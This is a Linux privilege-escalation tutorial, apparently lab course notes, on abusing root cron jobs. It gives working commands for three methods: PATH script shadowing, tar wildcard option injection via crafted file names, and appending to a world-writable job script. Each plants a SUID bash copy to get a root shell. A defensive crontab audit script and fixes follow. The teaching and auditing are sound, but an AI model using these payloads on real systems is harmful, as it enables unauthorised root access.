# Cron Jobs

## What are Cron Jobs?

In Linux, scheduled tasks are called **cron jobs**. System-wide cron jobs are defined in `/etc/crontab` (the cron table), where each entry also names the user the job runs as. If we are able to write a malicious payload into a script that a cron job executes automatically (every minute, say) as root, then that payload runs as root as well.

## Enumeration

Enumerate crontab:

```bash
cat /etc/crontab
```

For example:

![crontab](/files/-MfjXNJj8u33z7kqUa5J)

Here the five asterisks (minute, hour, day of month, month, day of week) mean "run this command every minute of every hour of every day", hence `overwrite.sh` and `/usr/local/bin/compress.sh` are executed every minute.

If we don't have permission to read `/etc/crontab`, [pspy](https://github.com/DominicBreuker/pspy) can still help us identify scheduled tasks by watching which processes get spawned over time.

## Method 1: Cron Path

Recall the crontab:

![crontab](/files/-Mfje_o7IJ3Zy_tZNfNS)

Note that `overwrite.sh` is invoked by a **relative path** (a bare file name with no directory), so cron looks it up along the `PATH` variable defined in the crontab, which is:

```
/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
```

Because `/home/user` is the first directory in that `PATH`, a malicious `overwrite.sh` created there shadows the real script and is executed by the cron job (as root) instead.

Create a malicious `overwrite.sh` in `/home/user`:

```bash
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
```

Don't forget to make it executable:

```bash
chmod +x /home/user/overwrite.sh
```

Wait for the cron job to run (here at most a minute), then try getting a root shell:

```bash
/tmp/bash -p
```

## Method 2: Cron Wildcard

Recall the crontab:

![crontab](/files/-MfjeeE2IycBJ4Jlc-EU)

Examine the content of `/usr/local/bin/compress.sh`:

![/usr/local/bin/compress.sh](/files/-MfjesLM-eLWOioYFYQ4)

Notice the wildcard passed to `tar`. This script is meant to back up the `/home/user` directory, but the shell expands `*` into the file names in that directory before `tar` sees them, so a file named like a `tar` option is parsed as one (wildcard argument injection). We can therefore store a privesc payload in `/home/user/runme.sh` and create files whose names make the cron job effectively execute the following command:

```bash
tar czf /tmp/backup.tar.gz --checkpoint=1 --checkpoint-action=exec=sh\ runme.sh
```

Create a privesc payload `/home/user/runme.sh`:

```bash
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
```

Make it executable:

```bash
chmod +x /home/user/runme.sh
```

Prepare `tar` injection part 1:

```bash
touch /home/user/--checkpoint=1
```

Prepare `tar` injection part 2:

```bash
touch /home/user/--checkpoint-action=exec=sh\ runme.sh
```

Wait for the cron job to run (here at most a minute), then try getting a root shell:

```bash
/tmp/bash -p
```

## Method 3: Cron File Overwrite

Recall the crontab:

![crontab](/files/-MfjlRpZbA_IbrOoNdPF)

Examine its permission:

![Permission](/files/-Mfjm4-s-f29NqySjjbh)

This script is owned by root and executed by root through the cron job, yet its permissions allow us to write to it, so we can simply append a privesc payload (or a reverse shell payload) to the file and wait for the cron job to execute it.

Append a privesc payload to `/usr/local/bin/overwrite.sh`:

```bash
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh
```

Wait for the cron job to run (here at most a minute), then try getting a root shell:

```bash
/tmp/bash -p
```
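All three methods above come down to a crontab entry that root runs but that a low-privileged user can influence. The following audit script is an added example (not part of the original notes) that checks a system crontab for exactly those three conditions: a relative command name resolved through a world-writable `PATH` directory, a job script that is world-writable, and a job script that runs `tar` on a shell wildcard. It assumes the `/etc/crontab` layout (five time fields, user, command) and GNU `stat`.

```bash
#!/usr/bin/env bash
# Audit a system crontab (default /etc/crontab) for the three weaknesses
# above: commands resolved through a world-writable PATH entry, job scripts
# that are world-writable, and job scripts that run tar on a shell wildcard.
# Assumes the /etc/crontab layout (time fields, user, command) and GNU stat;
# user crontabs (crontab -l) have no user field and are not covered.

# True if the "other write" bit (o+w) is set on the file or directory.
world_writable() {
    [ $((0$(stat -c %a "$1" 2>/dev/null || echo 0) & 2)) -ne 0 ]
}

# Prints one finding per line and returns 0, so it composes with set -e.
audit_crontab() {
    local tab="${1:-/etc/crontab}" path="$PATH"
    local f1 f2 f3 f4 f5 user cmd rest d
    while read -r f1 f2 f3 f4 f5 user cmd rest || [ -n "$f1" ]; do
        case "$f1" in
            ''|\#*) continue ;;                      # blank line or comment
            PATH=*) path="${f1#PATH=}"; path="${path#\"}"; path="${path%\"}"; continue ;;
            *=*)    continue ;;                      # SHELL=, MAILTO=, ...
            @*)     user="$f2"; cmd="$f3" ;;         # @reboot / @daily entries
        esac
        [ -n "$cmd" ] || continue
        if [ "${cmd#*/}" = "$cmd" ]; then
            # No slash: cron resolves the name against the crontab's PATH, so a
            # world-writable PATH directory lets anyone plant a same-named script.
            printf '%s\n' "$path" | tr ':' '\n' | while read -r d; do
                if [ -n "$d" ] && world_writable "$d"; then
                    echo "PATH: $user job '$cmd' resolves via world-writable $d"
                fi
            done
            continue
        fi
        [ -f "$cmd" ] || continue
        if world_writable "$cmd"; then
            echo "WRITABLE: $user job script $cmd is world-writable"
        fi
        # An unquoted * given to tar expands to file names, which tar then
        # parses as options (the --checkpoint-action trick shown above).
        if grep -Eq '(^|[[:space:];&|])tar[[:space:]][^#]*\*' "$cmd"; then
            echo "WILDCARD: $user job script $cmd runs tar on a shell wildcard"
        fi
    done < "$tab"
    return 0
}

# Stand-alone use: audit the given (or default) crontab when it is readable.
[ -r "${1:-/etc/crontab}" ] && audit_crontab "$1"
```

Any line it prints is a job that a non-root user can redirect; fixing the finding means using absolute paths, removing user-writable directories from the crontab `PATH`, making job scripts root-owned and mode 755 or stricter, and replacing `tar ... *` with an explicit directory argument.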

## Challenge: TryHackMe - CMesS

{% embed url="https://www.ctfwriteup.com/tryhackme/tcm-linux-privesc-course/cmess-medium" %}
TryHackMe - CMesS
{% endembed %}
